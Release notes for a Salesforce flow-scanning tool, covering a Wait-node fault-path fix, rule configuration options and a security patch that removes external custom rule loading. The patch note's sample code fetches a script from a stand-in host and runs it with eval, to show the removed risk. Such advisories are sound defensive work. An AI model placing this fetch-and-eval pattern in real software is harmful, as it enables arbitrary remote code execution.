Releases: Flow-Scanner/lightning-flow-scanner-core

MissingFaultPath bug fix for Wait nodes

07 Oct 19:27

v5.9 — Fix MissingFaultPath rule for Wait nodes

This release fixes issue #272, contributed by @chazwatkins, where the MissingFaultPath rule incorrectly flagged all "Wait" nodes.

The bug occurred because the rule did not distinguish between the different Wait subtypes. In Salesforce flows, only "Wait for Conditions" nodes can have fault paths; "Wait for Amount of Time" (WaitDuration) and "Wait Until Date" (WaitDate) nodes cannot. This fix updates the MissingFaultPath rule to ignore the WaitDuration and WaitDate subtypes while continuing to check the applicable cases.

Salesforce Wait Nodes Overview

1. Wait for Conditions

  • Lets a flow pause until certain conditions are true.
  • This is essentially an event-based pause and can have error handling logic attached — so a fault path is valid here.
  • For more details, refer to the Salesforce documentation on Wait for Conditions.

2. Wait for Amount of Time (WaitDuration)

  • Pauses the flow for a fixed amount of time.
  • This is purely time-based, with no real failure conditions for which Salesforce would allow fault handling.
  • Therefore, no fault path option is provided.
  • For more information, see the Salesforce documentation on Wait for Amount of Time.

3. Wait Until Date (WaitDate)

Changes

  • Added isValidSubtype method to properly handle applicable element subtypes.
  • Updated MissingFaultPath rule execution logic.
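
A sketch of the subtype check described above, added here as an example and not the project's own code. Only the isValidSubtype name and the WaitDuration/WaitDate values come from these notes; the node shape (name, subtype, element.elementSubtype, element.faultConnector), the list of fault-capable element kinds and the sample flow are assumptions.

```javascript
// Wait subtypes that, per the release notes, cannot have a fault path.
const NO_FAULT_PATH_SUBTYPES = new Set(["WaitDuration", "WaitDate"]);
// Element kinds this sketch treats as fault-capable (assumed subset).
const FAULT_CAPABLE = new Set(["waits", "recordLookups", "recordCreates", "actionCalls"]);

// Assumed node shape: { name, subtype, element: { elementSubtype?, faultConnector? } }.
function isValidSubtype(node) {
  if (node.subtype !== "waits") return true;
  return !NO_FAULT_PATH_SUBTYPES.has(node.element.elementSubtype);
}

// Names of nodes that should have a fault path but lack one.
// subtypeAware=false reproduces the pre-fix behaviour that flagged every Wait node.
function missingFaultPaths(nodes, subtypeAware = true) {
  return nodes
    .filter((n) => FAULT_CAPABLE.has(n.subtype))
    .filter((n) => !subtypeAware || isValidSubtype(n))
    .filter((n) => !n.element.faultConnector)
    .map((n) => n.name);
}

// Constructed sample flow, not taken from a real org.
const sampleNodes = [
  { name: "Wait_For_Approval", subtype: "waits", element: {} },
  { name: "Wait_3_Days", subtype: "waits", element: { elementSubtype: "WaitDuration" } },
  { name: "Wait_Until_Renewal", subtype: "waits", element: { elementSubtype: "WaitDate" } },
  { name: "Wait_For_Payment", subtype: "waits",
    element: { faultConnector: { targetReference: "Log_Error" } } },
  { name: "Get_Account", subtype: "recordLookups", element: {} },
  { name: "Set_Status", subtype: "assignments", element: {} },
];

console.log("before fix:", missingFaultPaths(sampleNodes, false));
console.log("after fix: ", missingFaultPaths(sampleNodes));
```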

Security Patch

04 Sep 16:24

🚨 v5 – Security Patch

This release delivers security improvements and removes custom rules.


🔒 Security Fixes

  • Removed custom rule loader
    • Previous versions allowed configuration files to load JavaScript from external sources.
    • This created an arbitrary code execution (ACE) risk, where malicious configs could execute arbitrary code.

      execute(flow: Flow, ruleOptions?: {}): RuleResult {
        fetch("https://example.com/script.js")
          .then(res => res.text())
          .then(code => {
            eval(code);        // 🚨 ACE happens here
          });

        return null;
      }

    • In v5, this behavior has been completely removed. Only built-in rules are now supported.
  • Removed dynamic paths in configuration
    • Config files can no longer point to external scripts or resources.

🛡 Dependency & Audit Updates

  • All dependencies updated to their latest secure versions.
  • Applied npm audit fix to patch known vulnerabilities.

📌 Impact

  • Custom rules functionality has been retired.
  • All packages that relied on the custom rule loader have been unpublished.

Note on Forks:
Using a fork? Check node_modules/ for RuleLoader.ts or RuleLoader.js. If present, it’s vulnerable.

For patched versions, see https://github.com/Flow-Scanner
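
One way to automate the fork check above and to find configs that still reference custom rule files, added here as an example and not part of the project. It assumes Node.js, a config already parsed into an object, and a constructed fixture (the example-fork package and ExampleCustomRule entry are made up).

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

const LOADER_FILES = new Set(["RuleLoader.ts", "RuleLoader.js"]);

// Walk `root` (for example node_modules/) and return every loader file found.
function findRuleLoaders(root) {
  const hits = [];
  const stack = [root];
  while (stack.length > 0) {
    const dir = stack.pop();
    let entries = [];
    try {
      entries = fs.readdirSync(dir, { withFileTypes: true });
    } catch {
      continue; // unreadable or missing directory: skip it
    }
    for (const entry of entries) {
      const full = path.join(dir, entry.name);
      // Symlinks report isDirectory() === false, so link cycles are not followed.
      if (entry.isDirectory()) stack.push(full);
      else if (LOADER_FILES.has(entry.name)) hits.push(full);
    }
  }
  return hits.sort();
}

// Return the names of rules in a parsed config object that still set `path`.
function rulesWithPath(config) {
  const rules = (config && config.rules) || {};
  return Object.keys(rules).filter((name) => rules[name] && "path" in Object(rules[name]));
}

// Constructed fixture: a fake dependency tree plus a parsed config.
function demo() {
  const root = fs.mkdtempSync(path.join(os.tmpdir(), "lfs-audit-"));
  const pkg = path.join(root, "node_modules", "example-fork", "out");
  fs.mkdirSync(pkg, { recursive: true });
  fs.writeFileSync(path.join(pkg, "RuleLoader.js"), "// constructed placeholder\n");
  fs.writeFileSync(path.join(pkg, "index.js"), "");
  const config = { rules: {
    MissingFaultPath: { severity: "error" },
    ExampleCustomRule: { path: "./rules/custom.js", severity: "warn" },
  } };
  const loaders = findRuleLoaders(root).map((p) => path.relative(root, p));
  fs.rmSync(root, { recursive: true, force: true });
  return { loaders, rules: rulesWithPath(config) };
}
```

In a real project, call findRuleLoaders("node_modules") from the repository root and pass each parsed scanner config to rulesWithPath; any hit from either function warrants review.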

4.50.0

02 Aug 17:44

What's Changed

  • Drop support for IRuleDefinition
  • chore: bump npm deps by @junners in #254
  • Feat/streamline rule def by @junners in #255

Full Changelog: v4.49.0...v4.50.0

4.49.0

14 Jul 00:46

What's Changed

Full Changelog: v4.48.0...v4.49.0

4.48.0

22 Jun 02:53

Full Changelog: v4.47.0...v4.48.0

4.47.0

21 Jun 22:11

What's Changed

Full Changelog: v4.46.0...v4.47.0

4.46.0 | Community Release

17 Jun 02:51

What's new?

  • Updated documentation for Custom Rules
  • Minor fixes

Full Changelog: v4.45.0...v4.46.0

4.45.0 | Community Release

12 Jun 15:55

What's new?

  • Minor fix to propagate suppression entity from advanced rule to rule common

Full Changelog: v4.44.0...v4.45.0

4.44.0 | Community Release

12 Jun 05:39

What's new?

New rule option: disabled. This option surfaces rules in the configuration, so that disabling one is an intentional choice. Surfacing rules this way also increases the visibility of new rules that can be adopted.

rules:
  MissingFaultPath:
    disabled: true

Full Changelog: v4.43.0...v4.44.0

v4.43.0

12 Jun 01:28

What's Changed

**Beta** Advanced Rule Configuration

Advanced rules provide granular control by allowing rules to be intentionally disabled at the rule level, ensuring consistent application across all flows. Additionally, the concept of suppressions is introduced, enabling users to "whitelist" specific components. This mechanism allows for exceptions to be defined, offering flexibility in rule enforcement while maintaining overall governance and compliance.

JSON

{
  "rules": {
    "<RuleName>": {
      "path": "local_path_of_your_js_file", // optional: when defined, this configuration will be used for the engine to recognize your custom rule
      "severity": "<User Configured Severity>",
      "expression": "<User Configured Expression which only applies to rules that take in `options`>",
      "disabled": "true", // optional: when true, rule will not be applied to all flows being scanned
      "suppressions": ["<User Configured Suppressions>"] // optional: when defined, takes an array of suppressed elements (not based on name but on specific type)
    }
  }
}

YAML

rules:
  MissingFaultPath: # User Defined Rule configuration
    path: "local_path_of_your_js_file" # Optional: when defined, this configuration will be used for the engine to recognize your rule
    severity: error # Optional: User Defined severity, can be `info`, `warn`, `error`
    expression: ">=58" # Optional: User defined expression, only applies if rule is Configurable=true
    disabled: "true" # Optional: when true, rule will not be applied to all flows being scanned
    suppressions: # Optional: when defined, takes an array of elements to be suppressed, keys can be found on suppressionElements on the rule definition
      - LogACall # Optional: when defined, rule engine will look at suppressionElement defined on the rule to match against this list

Activation

To activate advanced rules, set the environment variable IS_NEW_SCAN_ENABLED=true before running your commands.

macOS:

export IS_NEW_SCAN_ENABLED=true
sf flow scan

Windows:

setx IS_NEW_SCAN_ENABLED true
rem setx only affects new terminal sessions; open a new terminal before scanning
sf flow scan

Full Changelog: v4.42.0...v4.43.0